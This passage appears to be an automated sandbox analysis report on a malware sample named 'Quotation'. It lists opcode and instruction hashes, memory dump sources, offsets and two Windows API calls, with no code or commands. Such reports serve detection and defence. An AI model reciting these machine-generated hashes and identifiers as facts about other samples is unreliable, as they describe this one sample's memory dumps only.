                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f67565f87ca8eed39c29b43a0cf2108b16dd815beb596e80e7c94e5e46f8faa
                                                                                    • Instruction ID: dc76f8cc489481b4d9c2ff6016406531e65e428be7030c4550075f80c9523b2d
                                                                                    • Opcode Fuzzy Hash: 2f67565f87ca8eed39c29b43a0cf2108b16dd815beb596e80e7c94e5e46f8faa
                                                                                    • Instruction Fuzzy Hash: 24219E347003429BDB60DF3AC545A7E7BE6AF58744B10812AC806D7366EB388E07DBE0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ebb6b35675dda4f38bbaa72eefaff6d3198345e7f12d6ae06846621f18a6ff4a
                                                                                    • Instruction ID: 5cdb4afa3f67593aee6be49f04a5260b2d55d13f2e534d13bdb0f245cb00882a
                                                                                    • Opcode Fuzzy Hash: ebb6b35675dda4f38bbaa72eefaff6d3198345e7f12d6ae06846621f18a6ff4a
                                                                                    • Instruction Fuzzy Hash: D92180307003429BEB50DF2AC545A7E3BE6AB58744F10813AC806D7355EB39DD439BE0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d140ebfbf1070dc6ab6f2641d5a9c6e14db96216d26a8c7dbb724182af1c795d
                                                                                    • Instruction ID: c25ba3ad9d7ce529be03b70a9a792a6dc2cf73edf05b94ebc4b9378020f6756c
                                                                                    • Opcode Fuzzy Hash: d140ebfbf1070dc6ab6f2641d5a9c6e14db96216d26a8c7dbb724182af1c795d
                                                                                    • Instruction Fuzzy Hash: 56217A75F416159FDB00CFA9C981A9EBBF5EB48790F10802AF905EB340EB74E8418BA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5300ced4abdc7ed422022ee32ef018a62bb031ea733653e11c8e7095c6ebbcff
                                                                                    • Instruction ID: c8953f86c7207f947bd3f27720446a1a6e090ea21303492986aa8e50ad425dad
                                                                                    • Opcode Fuzzy Hash: 5300ced4abdc7ed422022ee32ef018a62bb031ea733653e11c8e7095c6ebbcff
                                                                                    • Instruction Fuzzy Hash: 9C2160746442046BEF60DB28D899B9A3FA6FB4DB20F104A26D005D7762DF28DC428BA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596564201.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_ad000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 97161ba8bf3e380088d7b2f881d90c29d5cf7436b2050eaf214198180035e871
                                                                                    • Instruction ID: f3e8c2315eb9c1874b770f8d1def1bc44dc4ac1f0839166b50948cf96b2e541d
                                                                                    • Opcode Fuzzy Hash: 97161ba8bf3e380088d7b2f881d90c29d5cf7436b2050eaf214198180035e871
                                                                                    • Instruction Fuzzy Hash: 08210771504304EFDB24CF60D9C4F26BBA1FB85314F24C66EE94A4B642C736D846CA62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8c8626de99a8ea5e886c9f98d447060d5de433d3a83b66378a5af8111fb72e4
                                                                                    • Instruction ID: add246bc2ae6b229cb23887f070e64695d82f004afe66c2cfefcec865a2a8e7f
                                                                                    • Opcode Fuzzy Hash: e8c8626de99a8ea5e886c9f98d447060d5de433d3a83b66378a5af8111fb72e4
                                                                                    • Instruction Fuzzy Hash: 89212730B003499FDB64EB68C5296EEB7F2AF49304F20046AD105EB391EF369D41CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78bcf63ca13e4a6bbfa57a955475bdc5c149b7c025577c2b865e72ec1046ad43
                                                                                    • Instruction ID: 2e4e94eb47a578e069984243845c7daf1c76ee1b66881b5bf21fe73a95e0bddf
                                                                                    • Opcode Fuzzy Hash: 78bcf63ca13e4a6bbfa57a955475bdc5c149b7c025577c2b865e72ec1046ad43
                                                                                    • Instruction Fuzzy Hash: DC212A30B003499FDB64EB68C5697EE77F2AB49300F20046AD106EB391DF769D41CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb4abc8bc18e0830ee9c979db36b0aa22158571182dc2526b98b73ca82a6ddf9
                                                                                    • Instruction ID: 8f1ca1a338003e56fa05cf6922ac54f60860b750a52f57027adcc03bdb33b6f7
                                                                                    • Opcode Fuzzy Hash: bb4abc8bc18e0830ee9c979db36b0aa22158571182dc2526b98b73ca82a6ddf9
                                                                                    • Instruction Fuzzy Hash: 6D2133746442046BDF60D72CD899B993FE6FB4DB20F104626D005D7766DF38DC428BA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d5f48f24b06aec3e39f27fae5b1639fec143404fd0681e075aea280496241810
                                                                                    • Instruction ID: 35fcecfcb080f937b62b8c4ff78a6aa62d5e667ebfbef272bfafd9ebc313d159
                                                                                    • Opcode Fuzzy Hash: d5f48f24b06aec3e39f27fae5b1639fec143404fd0681e075aea280496241810
                                                                                    • Instruction Fuzzy Hash: BB21A234B009559BEF04DA6DE955A8EBBF6FB883A0F148529E405EB340DB35ED018BD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f60e7e14734f7cd5e74b1ab55169ffc699ce89c47c673eaaaf0b5e4f3443ec9
                                                                                    • Instruction ID: e48656794e51f4bdf07240524c13b3c7542046b95d6debccd15ae2b70414c43e
                                                                                    • Opcode Fuzzy Hash: 1f60e7e14734f7cd5e74b1ab55169ffc699ce89c47c673eaaaf0b5e4f3443ec9
                                                                                    • Instruction Fuzzy Hash: CD113075F003519BCB109BBD980869E7BF9FB48750B10052AE50AE7750EF359D42DBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f9c3bf93e9719b87d73afcbf4b55f40ec673b8736143e4b8c8433e5ba833d7c4
                                                                                    • Instruction ID: b5460746b1e2afcbd6c6d92064aefaff9251e18110b9cfd6d0ae957cb1ceffea
                                                                                    • Opcode Fuzzy Hash: f9c3bf93e9719b87d73afcbf4b55f40ec673b8736143e4b8c8433e5ba833d7c4
                                                                                    • Instruction Fuzzy Hash: BB118235B109194BDF14A6A9CC14AAE77EAEBC8790F108539D405EB340DFB5AC028BA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ed86551573c2dbb3475c4cb8de2c0e336ce2b5817cbf109916d560ac980473ad
                                                                                    • Instruction ID: ce5b3a6f9bee055ccd3e0216b3fc97fc9d3ca385bbb613366c867bc7bcc73511
                                                                                    • Opcode Fuzzy Hash: ed86551573c2dbb3475c4cb8de2c0e336ce2b5817cbf109916d560ac980473ad
                                                                                    • Instruction Fuzzy Hash: E9115E31A01315ABCB61EFB994552DE7AF5EB48310F24047BD809E7302EB35C9428BA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4f0f8e7fa69674e9c7dbfdf994fab9f778d9c1faa54897ac4643b6f8c17c4754
                                                                                    • Instruction ID: 9658cf4969930d0213a2e4d8522926c39358f6ff043a3422186d0418f2e2706d
                                                                                    • Opcode Fuzzy Hash: 4f0f8e7fa69674e9c7dbfdf994fab9f778d9c1faa54897ac4643b6f8c17c4754
                                                                                    • Instruction Fuzzy Hash: 2F01B5357045501FEB12D67D885170E7BEADFCA750F25846AE009DB391DA65EC024791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dde553469fff5d3e213e3c87cc1779555030f56fe91b0e5c0b9abd802a061ee9
                                                                                    • Instruction ID: 36342f6e6e6df5051bab2ff9172875eee76212227ae15514d9fca3e092dc7c50
                                                                                    • Opcode Fuzzy Hash: dde553469fff5d3e213e3c87cc1779555030f56fe91b0e5c0b9abd802a061ee9
                                                                                    • Instruction Fuzzy Hash: 6C0122307002449FC714ABB890203AE7BA6EFCA710F1084BED009CB791EF358C459BA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4a7833def4f847989b068b1946466e60abde5a633afd72d3c03186b25952c692
                                                                                    • Instruction ID: 154dcc90fb33ff269ba435ea37e149dcb5d12eb2c580fdd24312c3d9a6e23a74
                                                                                    • Opcode Fuzzy Hash: 4a7833def4f847989b068b1946466e60abde5a633afd72d3c03186b25952c692
                                                                                    • Instruction Fuzzy Hash: 5221E3B5D01659AFCB10CF9AD984BDEFBB4FB48314F10812AE918A7200C3746954CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 162aa98d9e7ace9d4306dfd02125452df5651480a484d4b44af13fd4ec4baa66
                                                                                    • Instruction ID: 27b03ecd7e11a909c81648606b93970312cb1110093353028baf417aa5e136d9
                                                                                    • Opcode Fuzzy Hash: 162aa98d9e7ace9d4306dfd02125452df5651480a484d4b44af13fd4ec4baa66
                                                                                    • Instruction Fuzzy Hash: C901F936B018544BEF15D6BDCC24AEE7BE6DBC8740F24417ED406EB240DBA4A802CBE0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596564201.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_ad000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb3f6b3ea4c7f948b5930e0f5b35f24b9d5dc708ab96ac67f7f3367d8e482390
                                                                                    • Instruction ID: c131f3b65a4ee7e1f27976c6ec3e715cb29cce82a98d6c6bc032968b6491707a
                                                                                    • Opcode Fuzzy Hash: bb3f6b3ea4c7f948b5930e0f5b35f24b9d5dc708ab96ac67f7f3367d8e482390
                                                                                    • Instruction Fuzzy Hash: FB11D075504244DFCB11CF50C5C4B15BBA2FB45314F24C6AEE84A4B652C33AD84ACF52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0e450a00b983c8a9c2af0c46ba875b26808aaae8174200c7c88a2a108e9dfaa
                                                                                    • Instruction ID: 7ca00fe51f03ed149d75bef7b6111bae47cbc5fc83689366026a7af5aafd9114
                                                                                    • Opcode Fuzzy Hash: f0e450a00b983c8a9c2af0c46ba875b26808aaae8174200c7c88a2a108e9dfaa
                                                                                    • Instruction Fuzzy Hash: 0A012D31A01315ABCB61EFB894512EE7BF6EB48310F24047AD809E7302EB35C8418BA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1e0d198a88c4229216834c811128866bf43692c9ce779a8dea1f15c29704ce6
                                                                                    • Instruction ID: 57d2156ddb0b12bcb23c3d6024e6debff999c0c73f9f71992fe90b2e186a59ca
                                                                                    • Opcode Fuzzy Hash: e1e0d198a88c4229216834c811128866bf43692c9ce779a8dea1f15c29704ce6
                                                                                    • Instruction Fuzzy Hash: EB01D4347005515FDB29DA7C98A165A77E6DFCA760F14847AE10ACF342DB29DC0287C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a33efbe68399350effb3d5d1f7e1fbffff0b19b8bd0946151dbfa142dcee6a88
                                                                                    • Instruction ID: 8389be723d2397a9879786fd7e26ef78bd029c617fd0456408942ccb5a5a53fd
                                                                                    • Opcode Fuzzy Hash: a33efbe68399350effb3d5d1f7e1fbffff0b19b8bd0946151dbfa142dcee6a88
                                                                                    • Instruction Fuzzy Hash: 8811D0B5D01619AFCB00CF9AD884BDEFBB4FB48324F10812AE918A7340D374A954CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f62cb892e43f3f526ab61ca584b43a6ce5d180296ce0ed1d5c7f84844bd7a01d
                                                                                    • Instruction ID: 134c90ab7eee7fe86a68841958b82373405e456c05767a4675c0fb31539a7cef
                                                                                    • Opcode Fuzzy Hash: f62cb892e43f3f526ab61ca584b43a6ce5d180296ce0ed1d5c7f84844bd7a01d
                                                                                    • Instruction Fuzzy Hash: C501F4347004151BEB10D6AEC856B0FB3DADBC97A0F20893AF00ADB381EEA5EC034795
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 21a26849b06e61fc538a6c8b2dda3232d9fe772e2c7251ca5d6dff1de9179054
                                                                                    • Instruction ID: eecf9fdd5a37a8df531f18e00f1e6c8b1db83a15c05ffee06be4485a7f0b03d8
                                                                                    • Opcode Fuzzy Hash: 21a26849b06e61fc538a6c8b2dda3232d9fe772e2c7251ca5d6dff1de9179054
                                                                                    • Instruction Fuzzy Hash: AB01DC387008251BEB29D67C9992B1F77E6DBC97A0F108839F20ACB340DE25EC0203C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 837ee5823d7bf0ad528078ed14d357e20b765e245d2c868bf9db8ab4c92b97fb
                                                                                    • Instruction ID: 8c35d951f0308fdf34c3a2b884a114153bf2a083e0d3a668014850301980b22a
                                                                                    • Opcode Fuzzy Hash: 837ee5823d7bf0ad528078ed14d357e20b765e245d2c868bf9db8ab4c92b97fb
                                                                                    • Instruction Fuzzy Hash: 3A11E570A40348EFD701DFB8D456B9D7FB2EF8A700F2081A9C504AB692DA341E029B51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b4d241632be5866a863ab79df0c2a23a36163cf1253811297a3bf0abe32aad2
                                                                                    • Instruction ID: 318dfbc4b144d18f27f7adc732a1baaf75083d715c64e543021ba7c95cd0574f
                                                                                    • Opcode Fuzzy Hash: 4b4d241632be5866a863ab79df0c2a23a36163cf1253811297a3bf0abe32aad2
                                                                                    • Instruction Fuzzy Hash: ED01A4347005255FEB24D67CC96671F7BE6DB89791F108439F10ADB341EE65ED024B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cc7b3a2aafcfe45de3aa4e035042a179c066117d5093cd852d14132844672d55
                                                                                    • Instruction ID: 4735346b26561e7bced2dc1c87a6c6b754238c5d262588fba4db301bdd37818e
                                                                                    • Opcode Fuzzy Hash: cc7b3a2aafcfe45de3aa4e035042a179c066117d5093cd852d14132844672d55
                                                                                    • Instruction Fuzzy Hash: EB01F431F102299BDF04DA69E852A8E77B5FB85390F10853AE800EB341DB32EC018BD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b17731f629ed2243ae4149b27984b5abad5d0d258d7daad1b7e6661c04bdb92c
                                                                                    • Instruction ID: ec2124d22acd0c4164f5a2de7beb83bbedb46b09958abf600f5870b2af69678a
                                                                                    • Opcode Fuzzy Hash: b17731f629ed2243ae4149b27984b5abad5d0d258d7daad1b7e6661c04bdb92c
                                                                                    • Instruction Fuzzy Hash: 46015270A40208EBD705EFB9C456B9DBBB2FB89710F208168D5056B695EE705E029B51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9899bf7cec477a20f2cb276c6a630eca6c6616ed21c1432bd28c45557fb7f5ff
                                                                                    • Instruction ID: 5129f166efded92d43f54242b08bc303a863f3a37f996f99ef38767d62eb8924
                                                                                    • Opcode Fuzzy Hash: 9899bf7cec477a20f2cb276c6a630eca6c6616ed21c1432bd28c45557fb7f5ff
                                                                                    • Instruction Fuzzy Hash: A8F09E113093445FD70222B988307AB3FBEAFCB251B1540B7E106CB641DD91DC0153F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23f8a1955472d85ffd1c89fe7f1c5c9c115197bfc9b39274a0ac1ee374825923
                                                                                    • Instruction ID: 86aab7f44b60d08f5e4ddcfc535eac0542302fbd4b7412dcd04dc9a71c46ae96
                                                                                    • Opcode Fuzzy Hash: 23f8a1955472d85ffd1c89fe7f1c5c9c115197bfc9b39274a0ac1ee374825923
                                                                                    • Instruction Fuzzy Hash: 12F0A02130431A67E61026A94824B7F63AAABC97A0B208437F107D7740EDA5DC0226BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec874176764f47400eedcb13308ee189f4ed6c6de24abf58e3f4e18c66fbd253
                                                                                    • Instruction ID: ed40077c8c3e03c71588cf61c6a66b42e90d50fb15e8e7e7afe12a221970c016
                                                                                    • Opcode Fuzzy Hash: ec874176764f47400eedcb13308ee189f4ed6c6de24abf58e3f4e18c66fbd253
                                                                                    • Instruction Fuzzy Hash: 09F0E735B40118CFDB04DB78D9A8B6D7BB2EF88715F5040A9E5069B7B0DB34AC42CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76e1ab671561b21912a1d43739fdf4b2ad832d501960a896167ffd6f2e10e6a7
                                                                                    • Instruction ID: c6e9cc1b7757fc98243d4b23d06ef6fc24c3d0a8eac3d222613a42020b2fe851
                                                                                    • Opcode Fuzzy Hash: 76e1ab671561b21912a1d43739fdf4b2ad832d501960a896167ffd6f2e10e6a7
                                                                                    • Instruction Fuzzy Hash: E4F05C76E0065D8BFF208569C4017CEBBE9E7443A1F00043BE50AEB240D272AC018781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625198172.00000000392B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_392b0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a886ef4e71d9042c729f9979b5918e62676eba37cc82605641bba4c98919e1c1
                                                                                    • Instruction ID: 18831008c8c014df093df5d4648260b331d1f37eac07cfe769d0b486d4ad5a9f
                                                                                    • Opcode Fuzzy Hash: a886ef4e71d9042c729f9979b5918e62676eba37cc82605641bba4c98919e1c1
                                                                                    • Instruction Fuzzy Hash: F4E0D879D055896EEF00CE70864578F7BE8DB02294F2485EAC406DF106D175D9018700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33e8bf4bd4587a1616ee4bb1988faf79ab0bd14420607765a45d0047549cd2c2
                                                                                    • Instruction ID: e3abe7aea25d1bdf9414f7335187264eee46fc766adac4b1a45b0feb37d93cfe
                                                                                    • Opcode Fuzzy Hash: 33e8bf4bd4587a1616ee4bb1988faf79ab0bd14420607765a45d0047549cd2c2
                                                                                    • Instruction Fuzzy Hash: 52D02B2590CB982FE377A628E454B663BD45B45344F04419AE45BCB643C6C00C558390
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c6578a9ecfbaf2ca3251c331e4a4b160945dad2836ba103d43da96f4fcc2a9f
                                                                                    • Instruction ID: a103d0d52485ce5d32066a5238e9ce04ab6f781a9ebe0ca62e87cb409e4876ec
                                                                                    • Opcode Fuzzy Hash: 9c6578a9ecfbaf2ca3251c331e4a4b160945dad2836ba103d43da96f4fcc2a9f
                                                                                    • Instruction Fuzzy Hash: FCD0A734609B54DBC375EA59D104757B7D9BB48714B84545AE04B87F40CBA0FC0187D0
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008001), ref: 004036F6
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2597019906.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2596978642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597064403.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597082588.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597201634.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorModeVersion
